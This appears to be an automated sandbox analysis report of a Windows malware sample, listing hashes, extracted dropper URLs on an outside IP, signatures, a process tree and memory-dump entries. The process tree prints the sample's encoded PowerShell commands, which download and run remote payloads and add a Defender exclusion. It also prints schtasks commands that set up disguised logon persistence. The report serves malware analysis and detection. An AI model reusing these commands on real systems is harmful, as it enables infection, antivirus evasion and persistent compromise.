a525f983338f20fb35e1fc7e2bc2995d8beddb85dba93587fa3e3cf83d5cea09

General

Target

file.exe
Size

35KB
MD5

6f3b869f0d95d04f04cbdba253f965c9
SHA1

9ac833db812dd9c9d2f1fafd2f30375d035e7a8b
SHA256

a525f983338f20fb35e1fc7e2bc2995d8beddb85dba93587fa3e3cf83d5cea09
SHA512

fa4df655129b3d8b90f0d12454724383e1b09240592075276512dff1869aa6f1c9e9144de87681a62b235b0f6f347ba8b14fd153038cc636af162ebac264b990
SSDEEP

768:wQp/5JqoF5aCt8jBsgHlXx9py4r/wOPpdwMNhghy0qa:wcRvF5aCtyHl04kmTghy0f

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.194/go.png

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://62.204.41.194/F1.exe

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.194/me.png

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

6 1152 powershell.exe
7 600 powershell.exe
8 2024 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

NoSleep.exe

pid process

848 NoSleep.exe
Loads dropped DLL 1 IoCs

Processes:

powershell.exe

pid process

600 powershell.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1600 schtasks.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.execonhost.exe

pid process

2024 powershell.exe
568 powershell.exe
1152 powershell.exe
600 powershell.exe
600 powershell.exe
600 powershell.exe
1532 conhost.exe

flow	pid	process
6	1152	powershell.exe
7	600	powershell.exe
8	2024	powershell.exe

pid	process
848	NoSleep.exe

pid	process
600	powershell.exe

pid	process
1600	schtasks.exe

pid	process
2024	powershell.exe
568	powershell.exe
1152	powershell.exe
600	powershell.exe
600	powershell.exe
600	powershell.exe
1532	conhost.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	568	powershell.exe
Token: SeDebugPrivilege	1152	powershell.exe
Token: SeDebugPrivilege	600	powershell.exe
Token: SeDebugPrivilege	1532	conhost.exe

Suspicious use of WriteProcessMemory 31 IoCs

Processes:

file.exepowershell.exeNoSleep.execonhost.execmd.execmd.exe

description	pid	process	target process
PID 1220 wrote to memory of 2024	1220	file.exe	powershell.exe
PID 1220 wrote to memory of 2024	1220	file.exe	powershell.exe
PID 1220 wrote to memory of 2024	1220	file.exe	powershell.exe
PID 1220 wrote to memory of 600	1220	file.exe	powershell.exe
PID 1220 wrote to memory of 600	1220	file.exe	powershell.exe
PID 1220 wrote to memory of 600	1220	file.exe	powershell.exe
PID 1220 wrote to memory of 1152	1220	file.exe	powershell.exe
PID 1220 wrote to memory of 1152	1220	file.exe	powershell.exe
PID 1220 wrote to memory of 1152	1220	file.exe	powershell.exe
PID 1220 wrote to memory of 568	1220	file.exe	powershell.exe
PID 1220 wrote to memory of 568	1220	file.exe	powershell.exe
PID 1220 wrote to memory of 568	1220	file.exe	powershell.exe
PID 600 wrote to memory of 848	600	powershell.exe	NoSleep.exe
PID 600 wrote to memory of 848	600	powershell.exe	NoSleep.exe
PID 600 wrote to memory of 848	600	powershell.exe	NoSleep.exe
PID 848 wrote to memory of 1532	848	NoSleep.exe	conhost.exe
PID 848 wrote to memory of 1532	848	NoSleep.exe	conhost.exe
PID 848 wrote to memory of 1532	848	NoSleep.exe	conhost.exe
PID 848 wrote to memory of 1532	848	NoSleep.exe	conhost.exe
PID 1532 wrote to memory of 1556	1532	conhost.exe	cmd.exe
PID 1532 wrote to memory of 1556	1532	conhost.exe	cmd.exe
PID 1532 wrote to memory of 1556	1532	conhost.exe	cmd.exe
PID 1556 wrote to memory of 1600	1556	cmd.exe	schtasks.exe
PID 1556 wrote to memory of 1600	1556	cmd.exe	schtasks.exe
PID 1556 wrote to memory of 1600	1556	cmd.exe	schtasks.exe
PID 1532 wrote to memory of 1552	1532	conhost.exe	cmd.exe
PID 1532 wrote to memory of 1552	1532	conhost.exe	cmd.exe
PID 1532 wrote to memory of 1552	1532	conhost.exe	cmd.exe
PID 1552 wrote to memory of 1800	1552	cmd.exe	schtasks.exe
PID 1552 wrote to memory of 1800	1552	cmd.exe	schtasks.exe
PID 1552 wrote to memory of 1800	1552	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:600

C:\Users\Admin\AppData\Roaming\NoSleep.exe
"C:\Users\Admin\AppData\Roaming\NoSleep.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:848

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
5⤵
- Suspicious use of WriteProcessMemory
PID:1556

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
6⤵
- Creates scheduled task(s)
PID:1600

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
5⤵
- Suspicious use of WriteProcessMemory
PID:1552

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
6⤵
PID:1800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1152

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
b0a7f42b7b4a2ae2ff8988a4934f7291

SHA1
d6f2dcbff1d6bd2c92a7aedb3411eb82b77cb9a7

SHA256
c1e18a1ccbfeec832320681ef323d38f1cf49a323e524415e53d760a1aa42fce

SHA512
3e289dfac8d444818a97d72d217b0f4903ffad48201414118a8a26f055cc7ad260bfbba934531d29f25579bb4b4bb11e242cc9bd5505057db35a590afaab9526

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
b0a7f42b7b4a2ae2ff8988a4934f7291

SHA1
d6f2dcbff1d6bd2c92a7aedb3411eb82b77cb9a7

SHA256
c1e18a1ccbfeec832320681ef323d38f1cf49a323e524415e53d760a1aa42fce

SHA512
3e289dfac8d444818a97d72d217b0f4903ffad48201414118a8a26f055cc7ad260bfbba934531d29f25579bb4b4bb11e242cc9bd5505057db35a590afaab9526

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
b0a7f42b7b4a2ae2ff8988a4934f7291

SHA1
d6f2dcbff1d6bd2c92a7aedb3411eb82b77cb9a7

SHA256
c1e18a1ccbfeec832320681ef323d38f1cf49a323e524415e53d760a1aa42fce

SHA512
3e289dfac8d444818a97d72d217b0f4903ffad48201414118a8a26f055cc7ad260bfbba934531d29f25579bb4b4bb11e242cc9bd5505057db35a590afaab9526

Download Submit
C:\Users\Admin\AppData\Roaming\NoSleep.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
C:\Users\Admin\AppData\Roaming\NoSleep.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
\Users\Admin\AppData\Roaming\NoSleep.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
memory/568-85-0x0000000002504000-0x0000000002507000-memory.dmp

Filesize
12KB

Download
memory/568-58-0x0000000000000000-mapping.dmp

Download
memory/568-77-0x000007FEF2680000-0x000007FEF31DD000-memory.dmp

Filesize
11.4MB

Download
memory/568-69-0x000007FEF31E0000-0x000007FEF3C03000-memory.dmp

Filesize
10.1MB

Download
memory/568-87-0x000000000250B000-0x000000000252A000-memory.dmp

Filesize
124KB

Download
memory/568-86-0x0000000002504000-0x0000000002507000-memory.dmp

Filesize
12KB

Download
memory/568-81-0x000000001B8E0000-0x000000001BBDF000-memory.dmp

Filesize
3.0MB

Download
memory/568-76-0x0000000002504000-0x0000000002507000-memory.dmp

Filesize
12KB

Download
memory/600-73-0x0000000002354000-0x0000000002357000-memory.dmp

Filesize
12KB

Download
memory/600-90-0x000000000235B000-0x000000000237A000-memory.dmp

Filesize
124KB

Download
memory/600-68-0x000007FEF31E0000-0x000007FEF3C03000-memory.dmp

Filesize
10.1MB

Download
memory/600-70-0x000007FEF2680000-0x000007FEF31DD000-memory.dmp

Filesize
11.4MB

Download
memory/600-56-0x0000000000000000-mapping.dmp

Download
memory/600-96-0x0000000002354000-0x0000000002357000-memory.dmp

Filesize
12KB

Download
memory/600-82-0x0000000002354000-0x0000000002357000-memory.dmp

Filesize
12KB

Download
memory/600-78-0x000000001B7F0000-0x000000001BAEF000-memory.dmp

Filesize
3.0MB

Download
memory/600-97-0x000000000235B000-0x000000000237A000-memory.dmp

Filesize
124KB

Download
memory/848-94-0x0000000000000000-mapping.dmp

Download
memory/1152-74-0x00000000022F4000-0x00000000022F7000-memory.dmp

Filesize
12KB

Download
memory/1152-83-0x00000000022F4000-0x00000000022F7000-memory.dmp

Filesize
12KB

Download
memory/1152-108-0x00000000022FB000-0x000000000231A000-memory.dmp

Filesize
124KB

Download
memory/1152-107-0x00000000022F4000-0x00000000022F7000-memory.dmp

Filesize
12KB

Download
memory/1152-71-0x000007FEF2680000-0x000007FEF31DD000-memory.dmp

Filesize
11.4MB

Download
memory/1152-88-0x00000000022FB000-0x000000000231A000-memory.dmp

Filesize
124KB

Download
memory/1152-106-0x00000000022FB000-0x000000000231A000-memory.dmp

Filesize
124KB

Download
memory/1152-79-0x000000001B720000-0x000000001BA1F000-memory.dmp

Filesize
3.0MB

Download
memory/1152-57-0x0000000000000000-mapping.dmp

Download
memory/1152-65-0x000007FEF31E0000-0x000007FEF3C03000-memory.dmp

Filesize
10.1MB

Download
memory/1220-54-0x0000000000AD0000-0x0000000000AE0000-memory.dmp

Filesize
64KB

Download
memory/1532-100-0x000000001B690000-0x000000001BAC4000-memory.dmp

Filesize
4.2MB

Download
memory/1532-98-0x00000000001D0000-0x000000000062B000-memory.dmp

Filesize
4.4MB

Download
memory/1532-99-0x000000001BAF0000-0x000000001BF4C000-memory.dmp

Filesize
4.4MB

Download
memory/1552-104-0x0000000000000000-mapping.dmp

Download
memory/1556-101-0x0000000000000000-mapping.dmp

Download
memory/1600-103-0x0000000000000000-mapping.dmp

Download
memory/1800-105-0x0000000000000000-mapping.dmp

Download
memory/2024-59-0x000007FEFB651000-0x000007FEFB653000-memory.dmp

Filesize
8KB

Download
memory/2024-75-0x00000000023F4000-0x00000000023F7000-memory.dmp

Filesize
12KB

Download
memory/2024-89-0x00000000023FB000-0x000000000241A000-memory.dmp

Filesize
124KB

Download
memory/2024-55-0x0000000000000000-mapping.dmp

Download
memory/2024-64-0x000007FEF31E0000-0x000007FEF3C03000-memory.dmp

Filesize
10.1MB

Download
memory/2024-91-0x00000000023F4000-0x00000000023F7000-memory.dmp

Filesize
12KB

Download
memory/2024-92-0x00000000023FB000-0x000000000241A000-memory.dmp

Filesize
124KB

Download
memory/2024-72-0x000007FEF2680000-0x000007FEF31DD000-memory.dmp

Filesize
11.4MB

Download
memory/2024-84-0x00000000023F4000-0x00000000023F7000-memory.dmp

Filesize
12KB

Download
memory/2024-80-0x000000001B7D0000-0x000000001BACF000-memory.dmp

Filesize
3.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads